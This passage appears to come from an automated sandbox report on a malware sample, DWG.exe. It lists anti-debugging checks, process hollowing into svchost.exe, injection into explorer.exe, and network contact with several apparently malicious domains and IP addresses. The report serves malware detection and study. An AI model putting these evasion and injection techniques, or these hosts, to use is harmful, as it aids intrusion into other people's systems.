Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B28DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B48D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AFA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B23D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A97D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B0FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A876E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B48ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B2FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B2FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A87E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A88794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A74F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A74F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9B73D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9B73D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B0FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B0FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B4070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B4070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B48F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03753B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03753B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0372DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037F8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0372F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0372DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037D23E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037D23E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037D23E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037A53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037A53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03754BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03754BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03754BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037F5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03752397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0375B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03731B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03731B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037DD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0375138B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0375138B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0375138B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0376927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037DB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037DB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037F8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037EEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037B4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03729240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03729240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03729240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03729240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03764A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03764A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03725210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03725210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03725210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03725210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0372AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0372AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03743A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037EAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037EAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03738A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03752AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03752ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0373AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0373AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0375FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0375D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0375D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0372B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0372B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0372C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0374B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0375513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0375513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03744120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03744120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03744120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03744120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03744120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03729100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03729100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03729100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037B41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0372B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0372B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0372B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_037499BF mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\DWG.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\DWG.exe

Code function: 5_2_00409B40 LdrLoadDll,

Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0043BAD2 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0043BAE4 SetUnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.hcbg.online
Source: C:\Windows\explorer.exe	Domain query: www.knowsyourdream.com
Source: C:\Windows\explorer.exe	Network Connect: 198.187.31.159 80
Source: C:\Windows\explorer.exe	Network Connect: 154.216.113.38 80
Source: C:\Windows\explorer.exe	Domain query: www.jntycy.com
Source: C:\Windows\explorer.exe	Domain query: www.publiccoins.online
Source: C:\Windows\explorer.exe	Domain query: www.theravewizards.com
Source: C:\Windows\explorer.exe	Domain query: www.thebrandstudiointernational.com
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80
Source: C:\Windows\explorer.exe	Network Connect: 5.157.87.204 80

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\DWG.exe

Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 280000

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\DWG.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\DWG.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\DWG.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\DWG.exe

